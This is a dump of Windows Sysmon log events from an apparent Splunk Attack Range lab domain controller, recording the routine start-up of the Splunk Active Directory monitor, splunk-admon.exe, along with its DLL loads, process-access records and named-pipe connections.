10341000x800000000000000057344278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.648{8B6011A9-5ACE-618E-35F3-04000000F101}52848096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.648{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.648{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057344275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057344271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 734700x800000000000000057344269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.495{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057344264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344259Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344258Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344251Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344250Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057344249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344246Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 10341000x800000000000000057344237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8trueSplunk, Inc.Valid 10341000x800000000000000057344232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.479{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.465{8B6011A9-5ACE-618E-35F3-04000000F101}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 